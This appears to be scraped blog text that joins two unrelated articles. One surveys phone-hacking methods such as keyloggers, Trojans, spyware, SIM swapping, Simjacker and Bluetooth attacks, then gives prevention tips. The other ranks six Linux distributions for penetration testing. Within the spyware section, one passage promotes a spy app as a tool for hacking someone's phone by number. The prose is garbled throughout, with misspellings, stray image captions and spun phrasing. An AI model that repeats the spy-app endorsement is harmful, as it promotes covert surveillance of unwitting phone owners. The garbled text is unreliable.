It can be installed in your phone to record all information you type on your keyboard and send it to a third party set by the hacker.

keyloger

A Trojan horse, or Trojan, is a type of malware that is often disguised as legitimate software. Cyber-thieves and hackers can be employed by cuber-thieves and try to gain access to users’ systems.

Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems. Once activated, Trojans can enable cuber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system.

Hacker use phishing to impress victim to install Trojans in their devices. These actions can include:

  • Deleting data
  • Blocking data
  • Modifying data
  • Copying data
  • Disrupting the performance of computers or computer networks
Trojan horse virus

Spyware is a type of program that is installed to collect information about users, their computers, or their browsing habits. It tracks everything you do without your knowledge and sends the data to a remote user.

It also can download and install other malicious programs from the internet. Spyware works like adware, but is usually a separate program that is installed unknowingly when you install another freeware application.

how-android-users-can-detect-spyware

Also, a spy is an excellent tool for hacking someone’s phone by number, is the outstanding one among all other telephone number programmer applications at any point imagined.

More than a million clients in 190+ nations depend significantly on the form. The app can hack somebody’s mobile phone by simply their number if they’re utilizing an Android or iOS gadgets.

spyier

SIM Card Hacking

In August 2019, the CEO of Twitter had his SIM card hacked by SIM card swapping using the phishing method. SIM card swapping is performed when the hacker contacts your phone provider, pretends to be you, and then asks for a replacement SIM card.

Once the provider sends the new SIM to the hacker, the old SIM card will be deactivated, and your phone number will be stolen. This means the hacker has taken over your phone calls, messages, etc.

This method of hacking is relatively easy if the hacker can convince the provider that they are you. Keeping personal details to yourself is an important part of ensuring that hackers cannot pretend to be you.

In addition, Adaptive Mobile Security discovered a new way hackers were getting into phones using the SIM card—a method they call Simjacker. This method of hacking is more complex than phishing, as it targets a SIM card by sending a signal to the target device. If the message is opened and clicked on, hackers are able to spy on the hacked device and even find out the location of the device.

simjacker

Bluetooth Hacking

In the same way, professional hackers can use special software products to search for vulnerable mobile devices with an operating Bluetooth connection. These types of hacks are done when a hacker is in range of your phone, usually in a populated area.

Then when hackers are connected to your Bluetooth, they have access to all the information available and the internet connection to access the web, but the data must be downloaded while the phone is within range.

Social network hacker stealing data from file folder, criminal on smart phone.

How to Prevent to become a victim of phone hacking

As you saw, there are many techniques and tools hackers can use to hack your devices. Here are a few tips to ensure that you are not a victim of phone hacking:

1. Avoid sharing your phone with untrusted people

On the other hand, the easiest way for a hacker to steal your phone’s information is to gain access to it. Therefore, it is always important to avoid sharing your phone with untrusted people.

If you have been away from your phone around a group of strangers and are concerned about possible hacking, check your settings and look for strange apps.

2. Do encryption of Your Device

Also, encrypting your cell phone can protect you from being hacked and can protect your calls, messages, and critical information. To check if a device is encrypted, iPhone users can go into Touch ID & Passcode, scroll to the bottom, and enable Data protection. Android users have automatic encryption depending on the type of phone.

3. lock your SIM Card

addionally Putting a passcode on your SIM card can protect it from being hacked.

4. Check your WIFI and Bluetooth

It is fairly easy for hackers to connect to your phone using Wi-Fi or Bluetooth if they are on, so turn them off when not needed because there is no warning when a hacker attacks you.

If you fear being hacked in a public space, turning off your phone can block a hacker’s ability to hack you, this is an effective preventative method.

5. Use Security Protection or installing an anti-malware

Protecting your device from hackers require some knowledge that you have already. Use device provide security or installing a antivirus or a anti-malware in your device will block some untrusted app or websites.

Closing word

Making a point to understand how hacking works can help you practice security in your every day life. Know how to be prepared for being hacked, so that when it happens you can be on top of how to handle it.

6 Best Linux distribution for Hacking & penetration testing

Linux distrubition For hacking and Penetration Testing

For hacking and penetration testing, there are several operating systems that you should know or use once you want to start. In this article, we are going to discuss only the 6 best Linux distributions.

What is hacking?

Hacking refers to activities that seek to compromise digital devices, such as computers, smartphones, tablets, and even entire networks. And while hacking might not always be for malicious purposes, nowadays most references to hacking, and hackers, characterize it/them as unlawful activity by cybercriminals—motivated by financial gain, protest, information gathering (spying), and even just for the “fun” of the challenge. For more info click here

What is penetration testing?

Penetration testing also called pen testing or ethical hacking is the practice of testing a computer system, network, or web application to find security vulnerabilities that an attacker could exploit.

Penetration testing can be automated with software applications or performed manually. Either way, the process involves gathering information about the target before the test, identifying possible entry points, attempting to break in — either virtually or for real — and reporting back the findings.

The main objective of penetration testing is to identify security weaknesses. Penetration testing can also be used to test an organization’s security policy, its adherence to compliance requirements, its employees’ security awareness, and the organization’s ability to identify and respond to security incidents.

You may also like to know how to become an ethical hacker

1. Kali Linux – distros for hacking and penetration testing

kali Linux

Kali Linux is a top 1 among 6 Best OS for Hacking and Penetration Testing Distribution based on Debian. Developed by Offensive Security.

The first release was on February 5, 2006, it’s a completion of the BackTrack Linux Project. you may like to know how to install kali Linux properly in 2021

There are 100’s of hacking tools that are pre-installed with Kali Linux for various operations such as pen testing, vulnerabilities analysis, forensic analysis, information gathering, wireless attacks, exploitation tools, etc.

It also used to use GNOME as a Desktop Environment. Nowadays Kali Linux became a Rolling release Distro. You can use a desktop environment of your choice like KDE, MATE or XFCE…

also, It has a lot of tools in the Kali Repositories. You can download Kali Linux on its official web page Download. Kali Linux Ranked number one in Top 6 Penetration Testing & Ethical Hacking Linux 2020.

You may also like Basic Linux commands for beginners to advance

2. Parrot Security OS for hacking and penetration testing:

Parrot Security

Parrot Security is the top 2 among the 6 Best OS for Hacking and Penetration Testing, Forensics Distro dedicated to Ethical Hackers & Cyber Security Professionals.

Also, Parrot OS equally contributes to the security community the same as Kali Linux with a variety of hacking tools and excellent GUI interface.

It has also a big repository that collects a lot of amazing hacking tools for newbies and experts. Developed by FrozenBox.

The first release was in June 2013. It used to use MATE as a Desktop Environment it’s based on Debian like Kali Linux. You can download parrot security on its official web page Download.

You may also like Linux tutorial for beginners – Linux guide in 2021

3. BackBox Linux:

Backbox Linux

Backbox Linux is a top 3 among 6 Best Linux distros for Hacking and Penetration Testing distro based on Ubuntu Linux.

Developed by Backbox Team. The first release was on September 9, 2010.

Also, Backbox used to use XFCE as a Desktop Environment and Ubuntu LTS versions as a base.

It also contains the most professional, famous, and used tools in the PenTesting field like MSF, NMAP, BurpSuite, Armitage, SQLMap, and so on. You can download BackBox Linux on its official web page Download.

You may like also how to install windows subsystem for Linux

4. BlackArch Linux:

BlackArch linux

Black arch Linux-based Arch Linux is a top 4 among 6 Best Linux distros for Hacking and Penetration Testing designed for Professional & Elite Hackers who have the ability to work with Linux like a Pro.

Also, Black Arch contains nearly 2500 hacking tools, and almost it covering all the phases in cybersecurity.

it also used to use Fluxbox & OpenBox as a Desktop Environment with other DE’s. It has huge tools in the repository more than 1500+ hacking tools included in the Distro & Repo. The first release was in 2013. you can download BlackArch Linux on its official web page Download.

5- Fedora security Lab:

fedora security lab

Fedora Security environment is a top 5 among 6 best Linux distros for Hacking and Penetration Testing enables you to work on security auditing, forensics, and hacking. It also comes with a clean and fast desktop environment.

This distro contains essential networking tools like Wireshark, Medusa, Sqlninja, Yersinia, and more. Fedora Security environment makes pen-testing and security testing simple. you can also download Fedora security on its official web page Download

6- Samurai Web Testing Framework (Samurai-WTF):

samurai web penetration framework

Samurai WTF it’s a top 6 among 6 Best Linux distros for Hacking and Penetration Testing and Professional Web Application Penetration Testing Framework & Distro.

It also contains only WebApp Pentest Tools such as Burpsuite, SQLMap… and so on. Based on Ubuntu. The first release was in 2008. you can also download the Samurai web testing framework on its official web page Download.

Closing note

Choosing the best Linux distros for Hacking & penetration testing is a good sign to learn ethical hacking and Penetration testing concepts to enhance your skills and protect the enterprise assets from cybercriminals.

Every security professionals have their own favour of security OS to make use of hacking tools for both learning and commercial purpose. good choice for you.